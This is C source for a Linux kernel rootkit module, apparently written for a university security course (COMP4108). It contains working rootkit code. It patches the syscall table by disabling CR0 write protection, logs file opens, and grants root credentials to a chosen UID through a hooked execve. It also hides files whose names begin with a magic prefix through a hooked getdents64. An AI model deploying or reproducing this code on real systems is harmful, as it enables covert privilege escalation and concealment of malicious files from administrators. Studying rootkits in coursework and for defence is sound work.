/*
* COMP4108 Rootkit Framework
*/
#include <linux/sched.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <linux/version.h>
#include <linux/proc_ns.h>
#include <linux/fdtable.h>
#include <linux/kallsyms.h>
#include <linux/kernel.h>

#ifndef __NR_getdents
#define __NR_getdents 141
#endif
#define MODULE_NAME "rootkit"

// The linux dirent structure for Part C
struct linux_dirent {
    unsigned long   d_ino;
    unsigned long   d_off;
    unsigned short  d_reclen;
    char            d_name[1];
    char            pad;
    char            d_type;
};

unsigned long cr0;
static unsigned long *__sys_call_table;

typedef asmlinkage long (*t_syscall)(const struct pt_regs *);

static t_syscall original_openat; // create a variable to store the original openat function
static t_syscall original_execve;
static t_syscall original_getdents64;

static char* suffix;
module_param(suffix, charp, 0);
MODULE_PARM_DESC(suffix, "Received suffix parameter");

static int root_uid;
module_param(root_uid, int, 0);
MODULE_PARM_DESC(root_uid, "root priv granted");

static char* magic_prefix;
module_param(magic_prefix,charp,0);
MODULE_PARM_DESC(magic_prefix, "Received magic_prefix parameter");

unsigned long * get_syscall_table_bf(void){
unsigned long *syscall_table;
syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");
return syscall_table;
}

asmlinkage int new_openat(const struct pt_regs* regs){
// Declare our return value and a variable to store the filename
long ret;
char *filename;
size_t filename_len;
size_t suffix_len;

// Get the filename the syscall was called for
filename = kmalloc(4096, GFP_KERNEL); // alocate kernel memory

// copy the filename into the kernel variable
if (strncpy_from_user(filename, (void*) regs->si, 4096) < 0){
kfree(filename);
return 0;
}

// Check if the file is a .txt (has the .txt extension)
filename_len = strlen(filename);
suffix_len = strlen(suffix);
if (filename_len >= suffix_len){
if (strncmp(filename + (filename_len - suffix_len), suffix, suffix_len) == 0){
  printk(KERN_INFO "openat() called for %s\n", filename);
}
}

kfree(filename);

// Invoke the original openat syscall
ret = original_openat(regs);
return ret;
}

asmlinkage int new_execve(const struct pt_regs* regs){
// Declare our return value and a variable to store the filename
long ret;
char *filename;

// Get the filename the syscall was called for
filename = kmalloc(4096, GFP_KERNEL); // allocate kernel memory

// copy the filename into the kernel variable
if (strncpy_from_user(filename, (void*) regs->di, 4096) < 0){
kfree(filename);
return 0;
}

printk(KERN_INFO "executing: %s\n", filename);
printk(KERN_INFO "effective UID: %d\n", current->cred->euid.val);

if(current->cred->euid.val == root_uid){
struct cred *new_creds;
new_creds = prepare_kernel_cred(NULL);
if (new_creds) {
         commit_creds(new_creds);
     } 
    //  else {
    //      printk(KERN_ERR "Failed to commit new_creds.\n");
    //  }
}
// else{
//      printk(KERN_ERR "current effective uid does not match root_uid\n");
//      printk(KERN_INFO "root_uid: %d\n", root_uid);
//      printk(KERN_INFO "Current effective uid: %d\n", current->cred->euid.val);

// }
kfree(filename);

// Invoke the original execve syscall
ret = original_execve(regs);
return ret;
}

asmlinkage int new_getdents64(const struct pt_regs* regs){
   struct linux_dirent64 __user *dirent = (struct linux_dirent64 *) regs->si;
   struct linux_dirent64 *ker_buffer = NULL;
   struct linux_dirent64 *previous_dirent, *current_dirent = NULL;

   long ret = original_getdents64(regs);
   unsigned long offset = 0;

   ker_buffer = kmalloc(ret, GFP_KERNEL);

   if (copy_from_user(ker_buffer, dirent, ret)) {
       kfree(ker_buffer);
       return ret;
   }

   printk(KERN_INFO "getdents64() hook invoked.");

   while (offset < ret) {

       current_dirent = (struct linux_dirent64 *)((char*)ker_buffer + offset);

       printk(KERN_INFO "entry: %s\n", current_dirent->d_name);
       if (strncmp(current_dirent->d_name, magic_prefix, strlen(magic_prefix)) == 0) {
           if (current_dirent == ker_buffer) {
               ret -= current_dirent->d_reclen;
               memmove(current_dirent, (char*)current_dirent + current_dirent->d_reclen, ret - offset);
               continue;
           } else {
               previous_dirent->d_reclen += current_dirent->d_reclen;
           }  
       } else {
           previous_dirent = current_dirent;
       }
       offset += current_dirent->d_reclen;
   }

   copy_to_user(dirent, ker_buffer, ret);
   kfree(ker_buffer);
   return ret;
}

/*
* Used to let us modify memory regions and syscalls
*/
static inline void write_cr0_forced(unsigned long val){
unsigned long __force_order;
asm volatile(
"mov %0, %%cr0"
: "+r"(val), "+m"(__force_order));
}

static inline void protect_memory(void){
write_cr0_forced(cr0);
}

static inline void unprotect_memory(void)
{
write_cr0_forced(cr0 & ~0x00010000);
}

static int __init init_rootkit(void)
{
printk(KERN_INFO "Rootkit module initializing.\n");
__sys_call_table = get_syscall_table_bf(); // Get the sys_call_table information
if (!__sys_call_table)
return -1;
cr0 = read_cr0();

// Let's store the original functions so they can be restored later
original_openat = (t_syscall)__sys_call_table[__NR_openat];
original_execve = (t_syscall)__sys_call_table[__NR_execve];
original_getdents64 = (t_syscall)__sys_call_table[__NR_getdents64];

unprotect_memory();

__sys_call_table[__NR_openat] = (unsigned long) new_openat;
__sys_call_table[__NR_execve] = (unsigned long) new_execve;
__sys_call_table[__NR_getdents64] = (unsigned long) new_getdents64;

protect_memory();
printk(KERN_INFO "Rootkit module is loaded!\n");
return 0; // For successful load
}

static void __exit cleanup_rootkit(void){
printk(KERN_INFO "Rootkit module is unloaded!\n");

unprotect_memory();

__sys_call_table[__NR_openat] = (unsigned long)original_openat;
__sys_call_table[__NR_execve] = (unsigned long)original_execve;
__sys_call_table[__NR_getdents64] = (unsigned long)original_getdents64;

protect_memory();
printk(KERN_INFO "Rootkit module cleanup copmlete.\n");
}

module_init(init_rootkit);
module_exit(cleanup_rootkit);

MODULE_AUTHOR("Your Friendly Neighbourhood Hacker");
MODULE_LICENSE("GPL");
